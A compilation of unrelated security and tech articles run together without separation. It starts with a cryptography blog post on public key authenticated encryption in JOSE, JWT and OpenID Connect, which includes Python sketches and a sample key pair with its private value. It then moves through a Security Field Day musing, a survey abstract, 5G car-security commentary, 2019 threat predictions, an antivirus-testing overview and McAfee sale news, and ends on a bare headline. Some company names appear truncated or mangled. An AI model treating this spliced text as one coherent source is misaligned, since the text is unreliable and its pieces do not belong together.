Public key authenticated encryption and why you want it (Part III)


In Part I, we saw that authenticated encryption is usually the security goal you want in both the symmetric and public key settings. In Part II, we then looked at some ways of achieving public key authenticated encryption (PKAE), and discovered that it is not straightforward to build from separate signing and encryption methods, but it is relatively simple for Diffie-Hellman. In this final part, we will look at how existing standards approach the problem and how they could be improved.

JOSE and JWT

The JSON Object Signing and Encryption (JOSE) standards, used for JWTs, define a number of encryption modes, both symmetric and public key. The symmetric modes all provide authenticated encryption, but the public key encryption modes typically do not. Even the ECDH-ES algorithms do not, as they follow the ECIES approach that we previously showed discards sender authentication.

This has led standards like OpenID Connect (OIDC) to mandate that its tokens must always be signed, and if encryption is desired then the tokens must be first signed and then encrypted. This has obvious downsides, as the resulting nested JWT can be quite bulky, especially as the inner (signed) JWT is Base64-encoded and will then be Base64-encoded again after encryption. If you use RSA signatures and encryption (which are inexplicably still popular), the resulting JWT can easily become very large.

But does this nested JWT structure even achieve what we want? We saw in Part II that no simple composition of signing and encryption achieves PKAE. For example, if Alice sends a signed-then-encrypted message to Bob saying “You’re fired!”, then Bob can decrypt the message and then re-encrypt the signed inner message to Charlie. Charlie receives an apparently authentic message from Alice, clears his desk and leaves in tears, never to return. Naughty Bob!

The situation in JWT isn’t quite so bad though, as JWT defines a number of standard claims that can be used to prevent these attacks. In particular, the standard “iss” (issuer, like “from”) and “aud” (audience, or “to”) claims would make it very hard for Bob to pull off his nasty trick, as Charlie (or his mail reader) would see that the message was intended for Bob and not himself. These claims are mandatory in OIDC. If you are using JWTs, you should generally consider these claims to be mandatory too, even if the spec says they are optional. Failing to include them, or failing to check them, almost always leads to a security weakness.
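As a minimal sketch of those checks (illustrative Python, not tied to any particular JOSE library; assume claims is the dict recovered from an already decrypted and authenticated token):

def check_claims(claims, expected_issuer, my_identity):
    # Reject tokens that do not name an issuer and an audience at all.
    if "iss" not in claims or "aud" not in claims:
        raise ValueError("token missing iss/aud claims")
    if claims["iss"] != expected_issuer:
        raise ValueError("unexpected issuer: %r" % claims["iss"])
    # Per RFC 7519, "aud" may be a single string or a list of audiences.
    aud = claims["aud"]
    audiences = [aud] if isinstance(aud, str) else aud
    if my_identity not in audiences:
        # This is exactly the check that foils Bob's trick: Charlie sees
        # the message was addressed to Bob, not to himself.
        raise ValueError("token not addressed to us")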

Improving JOSE

JOSE consists of two parts: JWS provides digital signatures and MACs, while JWE provides encryption. This seems like a sensible split, but if we look at the security properties provided by individual algorithms, things become less clear:

- Symmetric MAC algorithms provide message authentication and (strong) unforgeability.
- RSA and ECDSA signatures also provide third-party verifiability and potentially non-repudiation.
- The symmetric encryption algorithms all provide authenticated encryption.
- The public key encryption algorithms generally just provide some form of confidentiality, mostly IND-CCA2, except for RSA1_5 (which is an abomination).

This makes moving between algorithms, particularly switching between symmetric and public key algorithms, problematic as the security properties may change. As I mentioned in Part I, I have seen situations in which developers switched from symmetric encryption to RSA, without realising that they lost all authentication in the process. While this may seem obvious, the standard presents them all as valid encryption algorithms and makes them appear interchangeable.

Furthermore, when moving from simple JWS signatures or MACs to also requiring encryption, developers are suddenly faced with a lot more complexity to navigate on their own.

My proposal for improvement is that all the algorithms in JWE and JWS should be interchangeable, which could be achieved if they all shared the same security goals. The idea in detail:

- The security goal for JWE should be authenticated encryption in all cases, for both symmetric and public key algorithms. Algorithms that do not provide authenticated encryption (all of the current public key encryption algorithms) should be deprecated and eventually removed in favour of authenticated replacements. (Hey, I didn’t say this was going to be a popular proposal!)
- For JWS, we should concentrate on the stronger third-party verification and non-repudiation goals of a real (public key) digital signature. That means removing the HMAC algorithms from JWS.

I have argued in this three part series that authenticated encryption is a useful and achievable security goal for encryption. By deprecating/removing the non-authenticated public key encryption schemes, we can replace them with authenticated alternatives such as the Noise one-way authenticated patterns we discussed in Part II.

If all JWE modes are authenticated, then we can recommend that all applications default to using JWE rather than JWS. JWS can then be reserved for cases where you genuinely want the stronger properties provided by public key signatures, for example when messages convey legal or financial transactions.

But what if you really do just want an authenticated set of claims without confidentiality, as with the current HMAC JWS algorithms? One (poor) solution would be to just put your claims in the JWE protected header and leave the payload empty. This would work, as the protected header is authenticated and integrity protected, but it forces you to mix your application data with generic metadata. A better solution would be to allow a JWE to have two payloads: one public and one private. Both would have the same content-type, but one is encrypted while the other is only authenticated (as associated data in the sense of AEAD). The JWE JSON encoding already allows such additional data in the form of the JWE AAD section, but this is currently missing from the compact encoding.

This is a useful idea in many cases anyway. Consider JWK, the standard for representing cryptographic keys as JSON documents. Currently all claims related to a key are stored in a single bag of attributes. This is problematic, as some of these claims are confidential (for instance private key material), while many are not, such as public key material or metadata including key IDs and usage constraints. Consider this example JWK for an X25519 key pair:

{ "kty": "OKP", "crv": "X25519", "x": "Mldalirlj1rJaZ88_sueClsTkOVrIgAukdp6WNEOxj8", "d": "F15VvXfZGXAg6mSzOeUw0RBb7hD6Fwb-NYj8qdy-9J4" }

Unless you are familiar with the specs or the details of elliptic curve cryptography, it may not be immediately obvious to you that the “d” claim here is actually the private key. The “x” claim is the (compressed) public key, which happens to be the x-coordinate of a point on the elliptic curve.
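To make the relationship concrete, here is a hedged sketch (ours, using the Python cryptography package) showing that “x” is fully determined by “d”: we re-derive the public value from the private scalar, and for a consistent key pair the two match.

import base64
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat

def b64url_decode(s):
    # JWK values are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

d = b64url_decode("F15VvXfZGXAg6mSzOeUw0RBb7hD6Fwb-NYj8qdy-9J4")
x = b64url_decode("Mldalirlj1rJaZ88_sueClsTkOVrIgAukdp6WNEOxj8")

private_key = X25519PrivateKey.from_private_bytes(d)
derived_x = private_key.public_key().public_bytes(Encoding.Raw, PublicFormat.Raw)
print(derived_x == x)  # True if the JWK above is a consistent key pair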

Mixing these all together in a single bag of attributes increases the chance of accidental disclosure of private key material, especially as JWKs are often published to publicly accessible HTTP endpoints. Imagine instead that all private/secret claims in a JWK were placed into separate public and secret key sections:

{ "kty": "OKP", "crv": "X25519", "public": { "x": "..." }, "secret": { "d": "..." }}

As a JWE, the same JWK could be written as follows, where public claims go in the “aad” block and the (encrypted) private key material in the “ciphertext” block:

{ "protected": { ... JWE Header ... }, "aad": { "kty": "OKP", "crv": "X25519", "public": { "x": "Mldalirlj1rJaZ88_sueClsTkOVrIgAukdp6WNEOxj8" } }, "ciphertext": "zuKfZSLQy7owFbuAY6W36V8SmK8W1yyuxP4uvYr2Sp2VAEmiYwEG..."}

The compact notation could also be extended to allow the extra public payload portion:

<header>.<encrypted-key>.<public>.<iv>.<private>.<tag>
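A hypothetical parser for this extended form could be as simple as the following sketch (the six-segment layout is this article’s proposal, not an existing JOSE format):

def split_extended_compact(token):
    parts = token.split(".")
    if len(parts) != 6:
        raise ValueError("expected 6 segments, got %d" % len(parts))
    header, encrypted_key, public, iv, private, tag = parts
    # "public" would be authenticated only (AAD); "private" is also encrypted.
    return {"header": header, "encrypted_key": encrypted_key,
            "public": public, "iv": iv, "private": private, "tag": tag}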

With these changes, together with key-driven cryptographic agility, I think a JOSE 2.0 could start to be a much more robust standard with clearly defined security goals and fewer opportunities for mistakes.

OpenID Connect

We’ve already discussed how OpenID Connect (OIDC) mandates that ID Tokens are signed, and only optionally encrypted. So long as implementations follow the strict guidance on token validation in the spec, I think the recommended signed-then-encrypted JWTs are reasonably secure. However, it is a shame that encryption is only optional while signatures are mandatory. I believe this is largely because of the difficulties of combining encryption with signatures we have discussed, and the resulting bloating of the JWT size caused by nested signed-then-encrypted structures with multiple layers of Base64-encoding.

But this default is almost exactly the opposite of what you would want. ID Tokens quite regularly contain sensitive information about users: names, email addresses, even dates of birth or postal address information. You absolutely want these to be encrypted in most cases. On the other hand, I suspect very few people care about non-repudiation of ID Tokens. Indeed, I suspect very few implementations bother to keep the ID Token around at all after authentication has completed, let alone store it away as evidence for future legal proceedings.

This is very much a case in which the security requirements at the application layer are for authentication (of course!) and confidentiality. But we don’t get that by default, because PKAE is difficult to achieve in JWTs. If PKAE modes were the norm in JWE then ID tokens could be encrypted and authenticated by default, and only signed in the rare cases where you need the additional assurances.

Authenticated API requests

There has been some interest in providing authenticated HTTP requests for enhanced API security. For example, Amazon famously requires HMAC-signed requests for AWS API calls, and there are a couple of proposals for adding signed requests to OAuth 2.0. The reasons for wanting signed API requests over and above the protections provided by HTTPS are usually given in terms of stronger authentication and integrity guarantees. None of the three documents linked above mentions non-repudiation or 3rd-party verifiability.

Most APIs really care about (data origin) authentication and authorization: did this request come from an authorised, trusted source? Using public key signatures for this is using a sledgehammer to crack a nut. There is a reason why TLS only uses signatures during the handshake: they are expensive to compute and verify, so using genuinely signed requests is very expensive in practice. To get around this, most “signed” requests, like Amazon’s, actually use symmetric HMAC authenticators instead. But this negates some of the advantages of signed requests, as both parties must know the shared secret. If we want to move away from pure bearer tokens for OAuth, partly because we are worried about the impact of compromised API servers, then a solution that requires the server to store recoverable copies of all client keys doesn’t seem like much of an improvement.

Contrast this with some of the Diffie-Hellman PKAE systems we have seen in this series. Here we get a genuine public key approach, but crucially the client (and server) can cache and reuse a derived symmetric key for multiple requests. This gives us the speed of symmetric cryptography with the least-authority properties of public key cryptography: the server shouldn’t need to store clients’ secret keys, and with PKAE it doesn’t.
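A sketch of that pattern (illustrative Python using the cryptography package; the key derivation and framing are our assumptions, not a complete protocol such as Noise):

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

def derive_request_key(my_priv, their_pub):
    shared = my_priv.exchange(their_pub)
    # Bind the key to this purpose; a real design would also bind identities.
    return HKDF(algorithm=hashes.SHA256(), length=32, salt=None,
                info=b"api-request-v1").derive(shared)

client_priv = X25519PrivateKey.generate()   # static client identity key
server_priv = X25519PrivateKey.generate()   # static server identity key

# The client derives (and can cache) one symmetric key for many requests.
key = derive_request_key(client_priv, server_priv.public_key())
nonce = os.urandom(12)
ct = ChaCha20Poly1305(key).encrypt(nonce, b'{"action": "list"}', b"POST /api/v1")

# The server derives the same key from its own private key; it never needs
# a recoverable copy of the client's secret.
server_key = derive_request_key(server_priv, client_priv.public_key())
print(ChaCha20Poly1305(server_key).decrypt(nonce, ct, b"POST /api/v1"))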

Furthermore, as requests are now encrypted, we can gain real end-to-end encryption and authentication of requests. This provides defence in depth against failures at the TLS layer, and avoids the shortcomings of point-to-point authentication evident in this recent critical Kubernetes vulnerability. If API requests in Kubernetes were strongly authenticated and authorized at the application level, rather than merely authenticated at each hop at the transport level (TLS), then this potentially catastrophic vulnerability might have been avoided.

Of course, there are cases where you might really want the stronger guarantees of a real signature: financial transactions, for example. But those cases are the exception rather than the norm.

Summary

I have argued in this series that the right default security goal for most applications is authenticated encryption . While this goal is now widely accepted for symmetric cryptography, it is still relatively rarely adopted in the public key setting. Hopefully the examples I have given will go some way to promoting that goal.


Some Random Thoughts From Security Field Day


I’m spending the week in some great company at Security Field Day, with awesome people who are really making me think about security in some different ways. Between our conversations on the way to presentations and the discussions we’re having after hours, I’m starting to see some things that I didn’t notice before.

Security is a hard thing to get into because it’s so different everywhere. Where everyone just sees one big security community, it is in fact a large collection of small communities. Thinking that there is just one security community would be much like thinking enterprise networking, wireless networking, and service provider networking are the same space. They may all deal with packets flying across the wires, but they are very different under the hood. Security is a lot of various communities with the name in common.

Security isn’t about tools. It’s not about software or hardware or a product you can buy. It’s about thinking differently. It’s about looking at the world through a different lens. How to protect something. How to attack something. How to figure all of that out. That’s not something you learn from a book or a course. It’s a way of adjusting your thinking to look at problems in a different way. It’s not unlike being in an escape room. Don’t look at the objects like you normally would. Instead, think about them in unique combinations that get you somewhere different than where you thought you needed to be.

Security is one of the only IT disciplines where failure is an acceptable outcome. If we can’t install a router or a wireless access point, it’s a bad job. However, in security, if you fail to access something that should have been secured, it was a success. That can lead to some very interesting situations. It’s important to realize that you also have to properly document your “failure” so people know what you tried to do to get there. Otherwise your success may just be a lack of proper failure.

Tom’s Take

I’m going to have some more thoughts from Security Field Day coming up another time. There’s just too much to digest at one time. Stay tuned for some more great discussions and highlights of my first real foray into the security community!

Document worth reading: “Small Sample Learning in Big Data Era”


As a promising area in artificial intelligence, a new learning paradigm called Small Sample Learning (SSL) has been attracting prominent research attention in recent years. In this paper, we aim to present a survey that comprehensively introduces the current techniques proposed on this topic. Specifically, current SSL techniques can be mainly divided into two categories. The first category of SSL approaches can be called ‘concept learning’, which emphasizes learning new concepts from only a few related observations. The purpose is mainly to simulate human learning behaviors such as recognition, generation, imagination, synthesis and analysis. The second category is called ‘experience learning’, which usually co-exists with the large sample learning manner of conventional machine learning. This category mainly focuses on learning with insufficient samples, and is also called small data learning in some of the literature. More extensive surveys of both categories of SSL techniques are presented, and some neuroscience evidence is provided to clarify the rationality of the entire SSL regime and its relationship with the human learning process. Some discussion of the main challenges and possible future research directions along this line is also presented. Small Sample Learning in Big Data Era


5G May Well Make Self-Driving Cars Less Cyber-Secure


Martin Hron, a senior researcher at cybersecurity giant Avast, says fifth-generation mobile networks may well leave driverless cars more exposed to attack than they are today. In an interview with Android Headlines, Hron conceded that it is currently hard to predict the direct impact 5G will have on the driverless vehicle field, but he speculated that once the technology is rolled out at scale, the security situation will only get worse.

"It's hard to say at this point," the industry expert claimed, "but it is very likely that as more of a driverless car's components and systems connect to the outside world over 5G, the attack surface will grow."

How the cybersecurity field will develop remains to be seen, and attention is increasingly turning to the coming wireless revolution and how it will apply to the emerging driverless sector. Although more network connectivity inevitably tends to make driverless technology less secure, the situation in the driverless vehicle field does not appear that bleak. Hron claimed: "We consider the car industry, and especially the smart and driverless vehicle sector, to be the only one with relatively strong security, because the research done by security researchers, the documented flaws and the proofs of concept still outnumber real attacks."



According to the Avast expert, the car industry needs to use this existing research to maintain its security advantage and stay ahead of attackers' techniques, refining the cybersecurity of vehicles, driverless ones included. Hron warned that security protections must be specified in detail at the initial product design stage. The industry has already taken some steps: for example, the widely used CAN bus system offers relatively weak security, so it is about to be replaced by a new system standard.

Today's connected vehicles are already using artificial intelligence (AI) to tackle security, and in the coming generation of driverless technology AI will become an integral part of everyday transport. Yet, as Hron explained, AI software is not necessarily more secure than conventional programs, because its complexity introduces new exploitable weaknesses.

For example, a driverless car's computer vision can be fooled by carefully crafted visual images into stopping the car, although this kind of attack has not yet been shown to pose a real risk. However, AI-based driverless systems resemble a computer system or a computer network more than a single entity, so their attack surface is larger, which also raises an attacker's odds of finding an exploitable flaw.

The security expert has warned before: "The arrival of 5G networks, IoT solutions and all the changes the next wireless revolution brings require car makers such as Waymo to do more to ensure their future products are as secure as possible."

"Doing more" can in fact mean many things, but at the very least the industry should look at limiting the scope of a driverless car's network communications to reduce the possible attack surface. As many experts have pointed out before, the cybersecurity of driverless cars is still in its infancy.

Five Cyber Threat Trends to Watch in 2019


As 2019 approaches, the online world has been getting less peaceful. Perhaps the attackers are rushing to hit their annual targets, or perhaps defenders have relaxed with year-end bonuses on the way; either way, security incidents large and small have been flooding our screens. As security practitioners we cannot change what has already happened; we can only plug the gaps promptly and learn from it.

To manage increasingly distributed and complex network environments, more and more advanced technologies have emerged. But technology is a double-edged sword: while it drives the digital transformation of industry, it also gives attackers a richer arsenal, AI techniques being one example. As artificial intelligence matures, AI is being applied to every corner of daily life and production. Experts have predicted that AI will play a very large role in the future of network security and could even reshape the entire security industry. Unfortunately, the attackers think so too. In short, cybercrime and cybersecurity are now evolving in the same direction.

Based on the current landscape, Fortinet has made some predictions about the network threats of 2019, listing five worth watching:

1. AI Fuzzing

Fuzzing, or fuzz testing, is one of the techniques security professionals routinely use in security testing, generally to find vulnerabilities in hardware and software interfaces and in applications. By injecting invalid, unexpected or random data into a program or interface and then watching for crashes, unexpected jumps, pop-ups and similar behaviour, it can effectively uncover potential memory leaks, code faults and other problems.



Because the threat vectors in the AI field are still largely uncharted, a large number of zero-days are likely to exist there, and in those conditions fuzzing may yield unexpected results. Although using fuzzing to hunt for zero-days gets little attention today, as AI and machine learning applications spread, fuzzing's efficiency may once again make it a favourite tool in attackers' hands.
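As a toy illustration of the mutation fuzzing described above (our sketch, not Fortinet's), corrupt a seed input at random and record which variants make the target raise:

import json
import random

def mutate(data, flips=8):
    buf = bytearray(data)
    for _ in range(flips):
        buf[random.randrange(len(buf))] ^= 1 << random.randrange(8)
    return bytes(buf)

def fuzz(parse, seed, rounds=10000):
    crashes = []
    for _ in range(rounds):
        sample = mutate(seed)
        try:
            parse(sample)                # target under test
        except Exception as exc:         # an exception here is a finding
            crashes.append((sample, exc))
    return crashes

findings = fuzz(lambda b: json.loads(b.decode("utf-8", "replace")),
                b'{"user": "alice", "admin": false}')
print(len(findings), "inputs raised exceptions")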

2. Continued Exploitation of Zero-Day Vulnerabilities

Although a huge number of vulnerabilities are already known, in practice fewer than 6% are ever actually used by attackers. From a security standpoint, however, any security tool must aim for full coverage, because there is no way to know which vulnerability an attacker will exploit. As the pool of potential threats keeps growing, so do the performance demands on security tools.



Frameworks such as zero-trust security architectures can offer some effective help, but they are still in their infancy and not widely deployed. In other words, faced with this problem, most individuals and organisations are unprepared for the coming generation of threats. Traditional defences can only fix known problems and have very limited ability to detect unknown threats. With attack frequency steadily rising, defence alone will not be enough; one day even the sandbox may not suffice.

3. Botnets

What is swarm activity? Botnets are the biggest example. As technology advances, more and more malicious activity exhibits swarm-like characteristics. A botnet can switch at will between coordinated and autonomous operation, which is why most network defences look so fragile against one. Most importantly, much as with using zero-days for mining, the sheer prevalence of botnets is likely to shape future criminal business models.



Today's cybercrime ecosystem is driven by people. Even the most professional attacker has to spend money to discover, build or exploit the vulnerabilities they need, and services such as ransomware vendors likewise depend on professional hackers as a resource. But if environments offering autonomous learning emerge, the interaction between hackers, service providers and customers will drop sharply, which further increases the difficulty of defence and raises their profitability.

4. Focused Attacks

In virtual networks, resources and bandwidth are routinely allocated according to need, with virtual machines started or shut down in real time to relieve resource pressure. The same idea applies in the attack domain: during an attack, resources across the network can be reallocated to accomplish a priority strike. Breaking into a network is like drilling holes, probing a tightly guarded defensive perimeter for gaps. An attacker can pre-program how resources are allocated during the attack so that the intrusion carries itself out autonomously.

5. Machine Learning

Machine learning is regarded as one of the most promising cybersecurity tools today, because it can train devices to perform specific tasks autonomously, such as behavioural analysis, and to analyse the complexity of a threat and take effective countermeasures when one appears. Compared with traditional manual remediation, machine learning greatly lightens the workload of security staff.



But every advantage has its downside. Machine learning has won over most technologists with its efficient learning and execution, but do not forget that hackers are, at bottom, technologists too. Machine learning's powerful learning capability, combined with its lack of self-awareness, exposes a weakness: by compromising the machine learning process, an attacker can directly alter a device's settings or behaviour and take it over.

Preparing for Tomorrow's Threats

Understanding forward-looking threats like these can only benefit network security. The shape of the online world keeps changing, and attackers' techniques determine our security strategies. Given the direction of today's global threats, organisations must respond rapidly to incidents to minimise losses. New technologies such as AI and machine learning may help us improve a reactive security posture, but for now the foundation of network defence remains the support of security practitioners everywhere.

Those are Fortinet's predictions for 2019's threat trends. They may sound arcane, but where security is concerned, listening, watching and learning more never hurts.

*Source: darkreading; compiled by Karunesh91. Please credit CodeSec.Net when republishing.

How Are Today's Network Security Products Actually Tested?


In the mid-to-late 1990s, the need to test network security products emerged almost simultaneously with the development of the first antivirus programs. At first, computer security magazines used home-grown methods to verify the effectiveness of the security solutions they covered; over time, dedicated security testing companies appeared, applying comprehensive test methodologies.

The earliest method was simply to collect supposedly malicious files from various computers and run scan tests against them. Because both the samples and the results of such tests were highly unreliable, the approach was constantly criticised by security vendors, and few people trusted the results it produced.

More than 20 years on, network security solutions have come a long way, but threats have grown far more powerful too. That, in turn, has accelerated the improvement of test methodologies, pushing the testing companies to design ever safer and more accurate methods. The process is extremely difficult both in cost and in technical terms, which is why the quality of security product testing now depends on a lab's finances and its accumulated expertise (as in the case of Kaspersky Lab, for example).

On the cost of testing: the truth is that independent testing is the only way to ensure results are fair and valid. NCAP (New Car Assessment Program), for instance, is a non-governmental organisation that, unlike the mandatory safety certification run by government agencies, maintains its own standards. Security product testing companies likewise have to spend heavily to win the recognition of the various vendors.

This problem is now gradually being solved: since the network security industry is built on networked products, machine learning can cut costs substantially, and machine-learning-based test results will become increasingly common.

Basic test methods for security products

On-demand scan (ODS): ODS was the first method used. The testing lab collects malicious programs of all types (mainly files infected with malware; today mostly trojans), adds them to a test set, and then has the product under test scan the whole set. The more malicious programs the product catches, the better it is judged to be. To get closer to real conditions, testers copy files from one folder to another during the test to observe how cross-infection is handled.

However, most of today's more advanced security technologies simply do not apply to this type of test, which means it cannot assess how effectively a solution counters threats. ODS is therefore usually combined with more advanced methods.
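The core of the ODS idea can be sketched in a few lines (a toy illustration, not any lab's actual methodology): hash every file under a directory and flag the ones matching known-bad digests.

import hashlib
from pathlib import Path

# Placeholder digests; a real scanner ships millions of signatures.
KNOWN_BAD = {"0" * 64}

def on_demand_scan(root):
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            if digest in KNOWN_BAD:
                hits.append(path)
    return hits

print(on_demand_scan("./samples"))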

On-execute test: a technique developed after ODS. The sample collection is copied to and launched on a machine where the security software is running, and the solution's reaction is recorded. This was once considered very advanced, but its shortcomings quickly showed up in practice, because modern attacks usually unfold in several stages and a malicious file is only one part of the attack. For example, a sample may wait for command-line arguments before running in a specific environment, such as a particular browser, or the sample may be a module in the form of a DLL that connects to a main trojan, such as a dynamically injected DLL trojan.

Real-world test (RW): currently the most complex method, but also the closest to real attack conditions; it imitates the entire infection cycle. On a clean system with the security solution installed, testers open a malicious file delivered by email, or follow an actual malicious link in a browser, to check whether the whole infection chain works, and at which stages the solution under test can stop the malicious attack.

This kind of test accounts for the range of problems a security product may encounter in a real network environment.

It does, however, require rigorous preparation. First, fully testing a hundred or more samples takes a large number of machines and a great deal of time, which only a few labs can afford. Second, many of today's trojans can recognise that they are running in a virtual environment; if so, they refuse to run and obstruct any attempt at analysis. For the most reliable results, the testing lab must therefore use physical machines with real addresses, and restart the security product for testing after each malware sample has run.

Another difficulty is generating the large database of malicious links needed for testing. Many malicious links disappear shortly after being tested and no longer have any real test value, so the quality of an RW test depends heavily on whether the lab can find malicious links that still actually work.

Behavioural or proactive test: the idea is to test against unknown samples. The product under test is kept continuously updated; then, after the final update, newly appeared malicious programs are collected into a sample set, and the on-demand scan and on-execute tests are run again. Some testing companies pack or obfuscate known threats to test a solution's ability to recognise malicious behaviour. The results of such tests are hard to evaluate correctly, though: some labs run them on machines fully disconnected from the network to preserve the character of the collected samples, but in the real world viruses mutate, so such a test is not truly realistic.

Removal or remediation test (does the product completely remove the malware?): this checks how thoroughly a product actually handles a malicious program, i.e. clearing autorun keys, removing scheduled tasks and other traces of malware activity. It is an important test: an incomplete clean-up can let malware come back from the dead. During the test, a clean system is first infected with the collected malware samples and the security product is left to detect and remove them; the machine is then rebooted and a product with the latest updates is installed to verify the result. This can be run on its own or as part of an RW test.

Performance test: this evaluates how efficiently a security product uses a computer's system resources. With the product installed and running, the speed of everyday operations is measured: system boot, file copying, archiving and unpacking, and application launch; in a word, a simulation of a real user's workload.

False positive test: this is necessary for judging the reliability of the final evaluation. Clearly, machine learning, especially unsupervised machine learning, will inevitably produce false positives, which must then be corrected by humans. A product may identify 100% of the malicious programs in a test, but in the real world it must also judge legitimate applications correctly. For this, various scenarios are used to create and test commonly used software.

Feedback: this is not a test method, but the most important stage of any test, without which results cannot be validated. After all tests are done, the lab sends the preliminary results to the vendor so that they can review them and identify flaws in the product. This matters, because a lab simply lacks the resources to examine every case, and testing errors are unavoidable. Those errors are not necessarily caused by the test methodology: for example, during an RW test an application may successfully evade detection yet perform no malicious action, because it never encountered the environment it needs to run, or because it was never malicious in the first place but built for advertising purposes; yet all this happens after the security product has made its call, and so it skews the final evaluation. A security solution is designed to block malicious operations; when no malicious operation took place and the anti-malware program behaved exactly as designed, such cases can only be resolved by analysing the sample's code and behaviour.

Testing specific capabilities of security products

This approach is used to test particular threat types or particular security technologies in depth. Many security product developers need to know which solution protects best against crypto-malware, for example, or which product provides the best protection for online banking systems. In such cases an overall evaluation of a solution is not very representative, because that result only shows that a product is "no worse than the others". That is not enough, so some testing labs run dedicated tests.

Exploit test: countering exploit-based attacks is harder than detecting malware samples, and not every security solution manages it. To evaluate a product's defensive technology, labs use the RW approach: testers collect a large set of malicious exploit packs, follow them on clean machines, record the traffic, and then replay those attacks for every anti-malware solution under test. To keep the experiment as clean as possible, some companies use, in addition to real exploit kits, their own exploits created with the Metasploit framework, making it possible to test how a solution reacts to unknown exploit code.

Financial threat test: online banking and bank client systems are attacked by cybercriminals more than anything else, so testers use many specific techniques, such as substituting web page content or remote system administration, and check how the security solution resists them. Many developers also offer dedicated technologies against financial threats, such as Kaspersky's SafeMoney, whose effectiveness is likewise checked by these tests.

Special platforms: the vast majority of tests are run on the most common platforms, such as Windows. Vendors, however, are sometimes more interested in security solutions for other platforms: Android, Linux, Mac OS, Windows Server, mobile operating systems, and even early Windows versions (most ATMs, for example, still run Windows XP).

Types of security product tests

Besides the test method, tests also differ by type. Normally security products are tested individually, for example testing Kaspersky and then testing AntiVirus, but that yields only a relative result and cannot show which product is better. So sometimes several products are tested together, for example Kaspersky and AntiVirus at the same time, to see how they react to the same malicious program. Such comparative tests consume more testing resources, but give developers and users more information.

Frequency and scoring method also matter. Most testing companies run a test every six months, and each test's results are evaluated independently: a solution rated highly in one test may be rated low in the next, and vice versa. Beyond the product's own characteristics, this also depends on the sample collection or method used in the test.

Continuous testing, by contrast, accumulates a combined score: some products are tested every month, for example, with a combined evaluation every six months. Such testing is the most accurate, so what matters most to consumers and developers alike is continuous testing. Only the results of a "long-distance race" can weigh a product's results across many tests and sample collections and reach a final verdict.

Continuous testing can assess the differences between a product's previous and current versions and predict how it may behave in future. It also shows that the product is being constantly updated, and not just its sample databases: it means the developers are closely watching the ever-changing security landscape and responding to change.

An overview of the security product testing market

Many companies now work in security product testing. That is undoubtedly good for the industry: each has its own strengths, and evaluations from different labs give a security product an all-round assessment:

AV: this Austrian company is one of the earliest on the testing market. It focuses on B2B security solutions and runs a series of tests, including RW tests, using its own virus samples. Testing runs continuously for 10 months, after which the best security products are named products of the year. Once a year, its testers use the ODS, OAS and on-execute methods to test security solutions for Android and Mac OS.

AV-TEST: a German company founded 20 years ago, currently the largest on this market. It runs a comparative RW test every month, with results published every two months; it also uses an ODS + ODS + OES method, i.e. samples are scanned, executed, and scanned again. AV-TEST also runs performance tests for Android, and twice a year uses the ODS method to test security solutions for Mac OS.

MRG: headquartered in the UK, the company has been testing security products since 2009. It specialises in in-depth technical testing and runs a quarterly comparative RW test (the 360 Assessment). MRG also tests against financial threats, with online banking tests and exploit prevention tests, and performs various on-demand tests.

SELAB: founded by former DTL employee Simon Edwards, the company has designed its own attack-testing framework and runs quarterly RW tests, including defence tests.

Virus Bulletin: the company uses the static WildList (a list of in-the-wild viruses) for a very simple ODS-based certification test, available for vendors to download. It also performs proactive behavioural tests of security products, but its database has not been updated for several months.

ICSA: this US company is a division of Verizon; it performs only certification tests and tests of anti-APT security solutions.

NSS Labs: a US company focused on the corporate market. Its work includes RW tests, defence tests and tests of anti-APT security solutions.

Magazines and online publishers: PC Magazine (the well-known US IT magazine), ComputerBild, Tom's Hardware Guide and others also run their own antivirus tests. However, their methods are not very transparent, and they do not publish their malware sample collections.

Beyond the market players above, there are many companies that run non-standard tests at the request of security product developers. Their results should be treated with caution: their methods are usually opaque, and the products being compared are not disclosed. It should be noted that a high-quality test methodology is a complex and expensive process that requires substantial resources and expertise. Only such testing can provide a valuable reference for security products.

McAfee May Be Sold Again: Private Equity Could Pay More Than $4.2 Billion

[Summary] Private equity firm Thoma Bravo is in preliminary talks to acquire McAfee, at a price well above the company's $4.2 billion valuation in 2016.

Tencent Tech News: According to people familiar with the matter cited by foreign media, private equity firm Thoma Bravo is in early talks to buy security software company McAfee from TPG and Intel, at a price well above the $4.2 billion valuation the company carried in 2016.

The sources said the talks could still fall apart and no deal is expected to be announced soon. They asked not to be named because the discussions are private.

McAfee, founded by John McAfee in 1987, develops network security software for personal computers and servers to protect users from malware and other viruses. This type of computer security defends against attacks on personal devices. More recently, McAfee's business has expanded into mobile devices and cloud computing, which is exactly where the hackers have migrated.

McAfee was a public company until 2010, when Intel acquired it for $7.6 billion, hoping to couple its chips tightly with McAfee's security technology. For Intel, that vision never materialised. In 2016, Intel announced the sale of 51% of the business to TPG at a valuation of $4.2 billion, taking a write-down of more than $3 billion. A few months later, TPG invited Thoma Bravo to make a minority investment in McAfee.

TPG's majority ownership helped transform the McAfee business through acquisitions in less than two years. In January, McAfee completed its acquisition of Skyhigh Networks, which helps companies monitor which cloud services their employees are using. In March, McAfee also acquired Tunnelbear, which provides virtual private networks that protect data when shared WiFi accounts are used.

According to one person familiar with the matter, Intel now regards itself as a purely financial investor in McAfee. Even so, through its minority stake Intel has shared in the value created by the newly independent McAfee, and if the Thoma Bravo deal succeeds it will recover some of the value it lost. Two people familiar with the matter said the deal would unify McAfee's ownership and could take the company public again.

Reuters reported in November that Thoma Bravo had approached Symantec with an acquisition offer. One of the people said a deal with McAfee would rule out an acquisition of Symantec. As of now, spokespeople for TPG and Intel have declined to comment, and a Thoma Bravo spokesperson did not immediately respond. (Tencent Tech; reviewed by Mingxuan)

The Digital Economy Arrives: A Data Security Law for a Data Security Winter



